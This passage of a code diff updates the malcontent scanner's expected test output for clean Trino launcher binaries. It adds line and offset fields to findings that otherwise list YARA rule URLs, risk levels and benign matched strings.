                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/false_positives/trino_upx.yara#trino_upx_override",
@@ -1006,6 +1305,10 @@
                         "kUNKNOWN:$",
                         "lmRnTEOIt"
                     ],
+                    "StartingLine": 3458,
+                    "EndingLine": 10403,
+                    "StartingOffset": 306,
+                    "EndingOffset": 362,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/false_positives/trino_upx.yara#trino_upx_override",
@@ -1028,6 +1331,10 @@
                         "kUNKNOWN:$",
                         "lmRnTEOIt"
                     ],
+                    "StartingLine": 3458,
+                    "EndingLine": 10403,
+                    "StartingOffset": 306,
+                    "EndingOffset": 362,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/false_positives/trino_upx.yara#trino_upx_override",
@@ -1050,6 +1357,10 @@
                         "kUNKNOWN:$",
                         "lmRnTEOIt"
                     ],
+                    "StartingLine": 3458,
+                    "EndingLine": 10403,
+                    "StartingOffset": 306,
+                    "EndingOffset": 362,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/false_positives/trino_upx.yara#trino_upx_override",

--- a/tests/linux/clean/trino.linux-arm64.launcher.json
+++ b/tests/linux/clean/trino.linux-arm64.launcher.json
@@ -51,6 +51,10 @@
                         "GetRandom",
                         "getRandom"
                     ],
+                    "StartingLine": 2958,
+                    "EndingLine": 13001,
+                    "StartingOffset": 7,
+                    "EndingOffset": 437,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/random_behavior.yara#random",
@@ -65,6 +69,10 @@
                         "lIp",
                         "IP"
                     ],
+                    "StartingLine": 105,
+                    "EndingLine": 5747,
+                    "StartingOffset": 1486,
+                    "EndingOffset": 132415,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention",
@@ -76,6 +84,10 @@
                     "MatchStrings": [
                         "http://AvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutanil"
                     ],
+                    "StartingLine": 3886,
+                    "EndingLine": 3886,
+                    "StartingOffset": 224,
+                    "EndingOffset": 408,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_with_url",
@@ -89,6 +101,10 @@
                         "amd64",
                         "arm64"
                     ],
+                    "StartingLine": 3880,
+                    "EndingLine": 12990,
+                    "StartingOffset": 70,
+                    "EndingOffset": 17,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref",
@@ -103,6 +119,10 @@
                         "linux",
                         "Linux"
                     ],
+                    "StartingLine": 3880,
+                    "EndingLine": 12991,
+                    "StartingOffset": 65,
+                    "EndingOffset": 15,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#multiple_os_ref",
@@ -114,6 +134,10 @@
                     "MatchStrings": [
                         "archive/zip"
                     ],
+                    "StartingLine": 3893,
+                    "EndingLine": 3893,
+                    "StartingOffset": 1001,
+                    "EndingOffset": 1011,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/archives/zip.yara#zip",
@@ -126,6 +150,10 @@
                         "UserPassword",
                         "passwordSet"
                     ],
+                    "StartingLine": 2958,
+                    "EndingLine": 5747,
+                    "StartingOffset": 4958,
+                    "EndingOffset": 119678,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/password/password.yara#password",
@@ -137,6 +165,9 @@
                     "MatchStrings": [
                         "privateKey"
                     ],
+                    "StartingLine": 3194,
+                    "EndingLine": 3213,
+                    "EndingOffset": 11707,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/ssl/private_key.yara#private_key_val",
@@ -148,6 +179,10 @@
                     "MatchStrings": [
                         "crypto/aes"
                     ],
+                    "StartingLine": 5747,
+                    "EndingLine": 5779,
+                    "StartingOffset": 90298,
+                    "EndingOffset": 29653,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/aes.yara#crypto_aes",
@@ -159,6 +194,10 @@
                     "MatchStrings": [
                         "crypto/ecdsa"
                     ],
+                    "StartingLine": 5747,
+                    "EndingLine": 5779,
+                    "StartingOffset": 94555,
+                    "EndingOffset": 32292,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/ecdsa.yara#crypto_ecdsa",
@@ -171,6 +210,10 @@
                         "PublicKey",
                         "publicKey"
                     ],
+                    "StartingLine": 2958,
+                    "EndingLine": 3225,
+                    "StartingOffset": 7982,
+                    "EndingOffset": 496,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/public_key.yara#public_key",
@@ -182,6 +225,9 @@
                     "MatchStrings": [
                         "crypto/tls"
                     ],
+                    "StartingLine": 3156,
+                    "EndingLine": 5779,
+                    "EndingOffset": 42943,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/tls.yara#tls",
@@ -193,6 +239,10 @@
                     "MatchStrings": [
                         "gzip"
                     ],
+                    "StartingLine": 5747,
+                    "EndingLine": 5779,
+                    "StartingOffset": 124994,
+                    "EndingOffset": 44551,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/gzip.yara#gzip",
@@ -205,6 +255,10 @@
                     "MatchStrings": [
                         "base64"
                     ],
+                    "StartingLine": 3213,
+                    "EndingLine": 5779,
+                    "StartingOffset": 2248,
+                    "EndingOffset": 33483,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/base64.yara#b64",
@@ -216,6 +270,10 @@
                     "MatchStrings": [
                         "nproc"
                     ],
+                    "StartingLine": 3897,
+                    "EndingLine": 3918,
+                    "StartingOffset": 266,
+                    "EndingOffset": 2861,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/cpu.yara#processor_count",
@@ -228,6 +286,10 @@
                     "MatchStrings": [
                         "/proc/sys/kernel/hostname"
                     ],
+                    "StartingLine": 3918,
+                    "EndingLine": 3918,
+                    "StartingOffset": 25,
+                    "EndingOffset": 49,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname.yara#gethostname",
@@ -240,6 +302,10 @@
                     "MatchStrings": [
                         "syscall.Uname"
                     ],
+                    "StartingLine": 5747,
+                    "EndingLine": 5747,
+                    "StartingOffset": 71386,
+                    "EndingOffset": 71398,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname",
@@ -253,6 +319,10 @@
                         "CombinedOutput",
                         "exec"
                     ],
+                    "StartingLine": 2958,
+                    "EndingLine": 5779,
+                    "StartingOffset": 1817,
+                    "EndingOffset": 52273,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/pipe.yara#popen_go",
@@ -267,6 +337,9 @@
                         "pluginversion",
                         "pluginpath"
                     ],
+                    "StartingLine": 3067,
+                    "EndingLine": 3941,
+                    "EndingOffset": 666,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/plugin/plugin.yara#plugin",
@@ -279,6 +352,10 @@
                         ").CombinedOutput",
                         "exec.(*Cmd).Run"
                     ],
+                    "StartingLine": 5747,
+                    "EndingLine": 5747,
+                    "StartingOffset": 142099,
+                    "EndingOffset": 142619,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#exec_cmd_run",
@@ -290,6 +367,10 @@
                     "MatchStrings": [
                         "mkdir"
                     ],
+                    "StartingLine": 3880,
+                    "EndingLine": 3880,
+                    "StartingOffset": 105,
+                    "EndingOffset": 109,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-create.yara#mkdir",
@@ -302,6 +383,10 @@
                     "MatchStrings": [
                         "Rmdir"
                     ],
+                    "StartingLine": 5747,
+                    "EndingLine": 5747,
+                    "StartingOffset": 80333,
+                    "EndingOffset": 80337,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-remove.yara#rmdir",
@@ -313,6 +398,10 @@
                     "MatchStrings": [
                         "unlinkat"
                     ],
+                    "StartingLine": 5747,
+                    "EndingLine": 5747,
+                    "StartingOffset": 71219,
+                    "EndingOffset": 71226,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-delete.yara#unlink",
@@ -325,6 +414,10 @@
                     "MatchStrings": [
                         "openFile"
                     ],
+                    "StartingLine": 5747,
+                    "EndingLine": 5747,
+                    "StartingOffset": 80069,
+                    "EndingOffset": 80093,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-open.yara#java_open",
@@ -337,6 +430,10 @@
                         "os.(*File).Read",
                         "ReadFile"
                     ],
+                    "StartingLine": 5747,
+                    "EndingLine": 5747,
+                    "StartingOffset": 79334,
+                    "EndingOffset": 144107,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-read.yara#go_file_read",
@@ -348,6 +445,10 @@
                     "MatchStrings": [
                         "readlinkat"
                     ],
+                    "StartingLine": 5747,
+                    "EndingLine": 5747,
+                    "StartingOffset": 71182,
+                    "EndingOffset": 80393,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink",
@@ -360,6 +461,10 @@
                     "MatchStrings": [
                         "flock"
                     ],
+                    "StartingLine": 3211,
+                    "EndingLine": 12983,
+                    "StartingOffset": 3919,
+                    "EndingOffset": 31,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/lock-update.yara#flock",
@@ -379,6 +484,10 @@
                         "/etc/mime.types",
                         "/etc/zoneinfo"
                     ],
+                    "StartingLine": 3892,
+                    "EndingLine": 3918,
+                    "StartingOffset": 480,
+                    "EndingOffset": 2221,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/etc.yara#etc_path",
@@ -390,6 +499,10 @@
                     "MatchStrings": [
                         "/etc/hosts"
                     ],
+                    "StartingLine": 3892,
+                    "EndingLine": 3892,
+                    "StartingOffset": 480,
+                    "EndingOffset": 489,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/etc-hosts.yara#etc_hosts",
@@ -401,6 +514,10 @@
                     "MatchStrings": [
                         "/etc/resolv.conf"
                     ],
+                    "StartingLine": 3906,
+                    "EndingLine": 3906,
+                    "StartingOffset": 224,
+                    "EndingOffset": 239,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/etc-resolv.conf.yara#etc_resolv_conf",
@@ -429,6 +546,10 @@
                         "/Users/martin/go/pkg/mod/golang.org/x/text",
                         "/Users/martin/go/pkg/mod/golang.org/x/sys"
                     ],
+                    "StartingLine": 5454,
+                    "EndingLine": 5779,
+                    "StartingOffset": 228,
+                    "EndingOffset": 52232,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/users.yara#home_path_users",
@@ -442,6 +563,10 @@
                         "/var/log/launcher.log",
                         "/var/log/server.log"
                     ],
+                    "StartingLine": 3928,
+                    "EndingLine": 3940,
+                    "StartingOffset": 3012,
+                    "EndingOffset": 412,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/var.yara#var_path",
@@ -453,6 +578,10 @@
                     "MatchStrings": [
                         "Chown"
                     ],
+                    "StartingLine": 2949,
+                    "EndingLine": 2949,
+                    "StartingOffset": 64244,
+                    "EndingOffset": 64248,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission/permission-chown.yara#Chown",
@@ -465,6 +594,10 @@
                         "chmod",
                         "Chmod"
                     ],
+                    "StartingLine": 2949,
+                    "EndingLine": 2949,
+                    "StartingOffset": 64237,
+                    "EndingOffset": 64262,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission/permission-modify.yara#chmod",
@@ -479,6 +612,10 @@
                         "dnsmessage",
                         "SetEDNS0"
                     ],
+                    "StartingLine": 3211,
+                    "EndingLine": 5779,
+                    "StartingOffset": 7405,
+                    "EndingOffset": 34805,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns.yara#go_dns_refs",
@@ -490,6 +627,10 @@
                     "MatchStrings": [
                         "CNAMEResource"
                     ],
+                    "StartingLine": 3211,
+                    "EndingLine": 5747,
+                    "StartingOffset": 7405,
+                    "EndingOffset": 107065,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-servers.yara#go_dns_refs_local",
@@ -502,6 +643,10 @@
                         "dns",
                         "TXT"
                     ],
+                    "StartingLine": 2958,
+                    "EndingLine": 5779,
+                    "StartingOffset": 8164,
+                    "EndingOffset": 36711,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-txt.yara#dns_txt",
@@ -514,6 +659,10 @@
                         "http",
                         "HTTP"
                     ],
+                    "StartingLine": 2958,
+                    "EndingLine": 5779,
+                    "StartingOffset": 4922,
+                    "EndingOffset": 48610,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http.yara#http",
@@ -525,6 +674,10 @@
                     "MatchStrings": [
                         "www-authenticate"
                     ],
+                    "StartingLine": 3906,
+                    "EndingLine": 3906,
+                    "StartingOffset": 64,
+                    "EndingOffset": 79,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/auth.yara#http_auth",
@@ -538,6 +691,10 @@
                         "HTTP",
                         "http"
                     ],
+                    "StartingLine": 2958,
+                    "EndingLine": 5779,
+                    "StartingOffset": 4922,
+                    "EndingOffset": 48610,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post",
@@ -550,6 +707,10 @@
                         "HTTPS_PROXY",
                         "HTTP_PROXY"
                     ],
+                    "StartingLine": 3892,
+                    "EndingLine": 3942,
+                    "StartingOffset": 540,
+                    "EndingOffset": 25,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/proxy.yara#http_proxy_env",
@@ -562,6 +723,10 @@
                     "MatchStrings": [
                         "User-Agent"
                     ],
+                    "StartingLine": 3892,
+                    "EndingLine": 3892,
+                    "StartingOffset": 150,
+                    "EndingOffset": 159,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http-request.yara#http_request",
@@ -573,6 +738,10 @@
                     "MatchStrings": [
                         "ipAddr"
                     ],
+                    "StartingLine": 5747,
+                    "EndingLine": 5747,
+                    "StartingOffset": 113125,
+                    "EndingOffset": 113130,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/addr.yara#ip_addr",
@@ -584,6 +753,10 @@
                     "MatchStrings": [
                         "hostunknown port"
                     ],
+                    "StartingLine": 3895,
+                    "EndingLine": 3895,
+                    "StartingOffset": 296,
+                    "EndingOffset": 311,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/host_port.yara#host_port_ref",
@@ -595,6 +768,10 @@
                     "MatchStrings": [
                         "IsLinkLocalUnicast"
                     ],
+                    "StartingLine": 3213,
+                    "EndingLine": 5747,
+                    "StartingOffset": 7637,
+                    "EndingOffset": 98744,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-parse.yara#ip_go",
@@ -606,6 +783,10 @@
                     "MatchStrings": [
                         "LookupIP"
                     ],
+                    "StartingLine": 2958,
+                    "EndingLine": 5747,
+                    "StartingOffset": 5388,
+                    "EndingOffset": 116838,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-resolve.yara#gethostbyaddr",
@@ -618,6 +799,9 @@
                     "MatchStrings": [
                         "LookupHost"
                     ],
+                    "StartingLine": 3179,
+                    "EndingLine": 3179,
+                    "EndingOffset": 9,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/resolve/hostname-resolve.yara#go_resolve",
@@ -630,6 +814,10 @@
                         "socket",
                         "accept"
                     ],
+                    "StartingLine": 2949,
+                    "EndingLine": 5747,
+                    "StartingOffset": 65623,
+                    "EndingOffset": 115317,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-listen.yara#listen",
@@ -641,6 +829,10 @@
                     "MatchStrings": [
                         "getsockname"
                     ],
+                    "StartingLine": 5747,
+                    "EndingLine": 5747,
+                    "StartingOffset": 71680,
+                    "EndingOffset": 71690,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-local_addr.yara#getsockname",
@@ -653,6 +845,10 @@
                     "MatchStrings": [
                         "SetsockoptInt"
                     ],
+                    "StartingLine": 3211,
+                    "EndingLine": 5747,
+                    "StartingOffset": 6565,
+                    "EndingOffset": 77425,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-options-set.yara#go_setsockopt_int",
@@ -664,6 +860,10 @@
                     "MatchStrings": [
                         "getpeername"
                     ],
+                    "StartingLine": 5747,
+                    "EndingLine": 5747,
+                    "StartingOffset": 71660,
+                    "EndingOffset": 71670,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-peer-address.yara#getpeername",
@@ -676,6 +876,10 @@
                     "MatchStrings": [
                         "recvfrom"
                     ],
+                    "StartingLine": 5747,
+                    "EndingLine": 5747,
+                    "StartingOffset": 71700,
+                    "EndingOffset": 71707,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-receive.yara#recvmsg",
@@ -688,6 +892,10 @@
                     "MatchStrings": [
                         "sendto"
                     ],
+                    "StartingLine": 5747,
+                    "EndingLine": 5747,
+                    "StartingOffset": 71717,
+                    "EndingOffset": 71722,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-send.yara#sendmsg",
@@ -700,6 +908,10 @@
                     "MatchStrings": [
                         "dialTCP"
                     ],
+                    "StartingLine": 2958,
+                    "EndingLine": 5747,
+                    "StartingOffset": 2930,
+                    "EndingOffset": 115898,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/tcp/connect.yara#connect_tcp",
@@ -711,6 +923,10 @@
                     "MatchStrings": [
                         "ReadFromUDP"
                     ],
+                    "StartingLine": 3211,
+                    "EndingLine": 3213,
+                    "StartingOffset": 2248,
+                    "EndingOffset": 9117,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/udp/udp-receive.yara#udp_listen",
@@ -723,6 +939,10 @@
                         "WriteMsgUDP",
                         "DialUDP"
                     ],
+                    "StartingLine": 3211,
+                    "EndingLine": 5747,
+                    "StartingOffset": 2261,
+                    "EndingOffset": 116254,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/udp/udp-send.yara#udp_send",
@@ -734,6 +954,10 @@
                     "MatchStrings": [
                         "http://AvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKa"
                     ],
+                    "StartingLine": 3886,
+                    "EndingLine": 3886,
+                    "StartingOffset": 224,
+                    "EndingOffset": 295,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#http_url",
@@ -745,6 +969,9 @@
                     "MatchStrings": [
                         "RequestURI"
                     ],
+                    "StartingLine": 3135,
+                    "EndingLine": 3135,
+                    "EndingOffset": 9,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/parse.yara#url_handle",
@@ -756,6 +983,10 @@
                     "MatchStrings": [
                         "net/url"
                     ],
+                    "StartingLine": 2958,
+                    "EndingLine": 5779,
+                    "StartingOffset": 2804,
+                    "EndingOffset": 39769,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/request.yara#requests_urls",
@@ -768,6 +999,10 @@
                         "syscall.Sendfile",
                         "sendfile"
                     ],
+                    "StartingLine": 5747,
+                    "EndingLine": 5779,
+                    "StartingOffset": 71547,
+                    "EndingOffset": 38375,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/sendfile.yara#sendfile",
@@ -780,6 +1015,10 @@
                     "MatchStrings": [
                         "netlink"
                     ],
+                    "StartingLine": 5779,
+                    "EndingLine": 5779,
+                    "StartingOffset": 19955,
+                    "EndingOffset": 19961,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/os/kernel/netlink.yara#netlink",
@@ -791,6 +1030,10 @@
                     "MatchStrings": [
                         "daemon"
                     ],
+                    "StartingLine": 3938,
+                    "EndingLine": 3940,
+                    "StartingOffset": 526,
+                    "EndingOffset": 428,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/daemon/daemon.yara#daemon",
@@ -805,6 +1048,10 @@
                         "LockablePidFile",
                         "pidFile"
                     ],
+                    "StartingLine": 2958,
+                    "EndingLine": 5747,
+                    "StartingOffset": 923,
+                    "EndingOffset": 145165,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/pid_file.yara#pid_file",
@@ -816,6 +1063,10 @@
                     "MatchStrings": [
                         "setgroups"
                     ],
+                    "StartingLine": 3911,
+                    "EndingLine": 3911,
+                    "StartingOffset": 824,
+                    "EndingOffset": 832,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groups-set.yara#setgroups",
@@ -840,6 +1091,10 @@
                     "MatchStrings": [
                         "urandom"
                     ],
+                    "StartingLine": 7903,
+                    "EndingLine": 7903,
+                    "StartingOffset": 220,
+                    "EndingOffset": 226,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/random_behavior.yara#random",
@@ -853,6 +1108,10 @@
                         "executable packer",
                         "UPX!"
                     ],
+                    "StartingLine": 1,
+                    "EndingLine": 8740,
+                    "StartingOffset": 236,
+                    "EndingOffset": 116,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/packer/upx.yara#upx",
@@ -864,6 +1123,10 @@
                     "MatchStrings": [
                         "AES"
                     ],
+                    "StartingLine": 4076,
+                    "EndingLine": 4076,
+                    "StartingOffset": 91,
+                    "EndingOffset": 93,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/aes.yara#crypto_aes",
@@ -875,6 +1138,10 @@
                     "MatchStrings": [
                         "/Users/martin/go/pkg"
                     ],
+                    "StartingLine": 4017,
+                    "EndingLine": 4017,
+                    "StartingOffset": 104,
+                    "EndingOffset": 123,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/users.yara#home_path_users",
@@ -886,6 +1153,10 @@
                     "MatchStrings": [
                         "/proc/self/exe"
                     ],
+                    "StartingLine": 8728,
+                    "EndingLine": 8728,
+                    "StartingOffset": 62,
+                    "EndingOffset": 75,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/self-exe.yara#proc_self_exe",
@@ -898,6 +1169,10 @@
                         "dns",
                         "TXT"
                     ],
+                    "StartingLine": 2656,
+                    "EndingLine": 3097,
+                    "StartingOffset": 13,
+                    "EndingOffset": 74,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-txt.yara#dns_txt",
@@ -910,6 +1185,10 @@
                         "http",
                         "HTTP"
                     ],
+                    "StartingLine": 2656,
+                    "EndingLine": 8725,
+                    "StartingOffset": 66,
+                    "EndingOffset": 62,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http.yara#http",
@@ -921,6 +1200,10 @@
                     "MatchStrings": [
                         "http://upx.sf.net"
                     ],
+                    "StartingLine": 8725,
+                    "EndingLine": 8725,
+                    "StartingOffset": 59,
+                    "EndingOffset": 75,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#http_url",
@@ -941,6 +1224,10 @@
                         "kUNKNOWN:$",
                         "lmRnTEOIt"
                     ],
+                    "StartingLine": 2597,
+                    "EndingLine": 8684,
+                    "StartingOffset": 306,
+                    "EndingOffset": 105,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/false_positives/trino_upx.yara#trino_upx_override",
@@ -963,6 +1250,10 @@
                         "kUNKNOWN:$",
                         "lmRnTEOIt"
                     ],
+                    "StartingLine": 2597,
+                    "EndingLine": 8684,
+                    "StartingOffset": 306,
+                    "EndingOffset": 105,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/false_positives/trino_upx.yara#trino_upx_override",
@@ -985,6 +1276,10 @@
                         "kUNKNOWN:$",
                         "lmRnTEOIt"
                     ],
+                    "StartingLine": 2597,
+                    "EndingLine": 8684,
+                    "StartingOffset": 306,
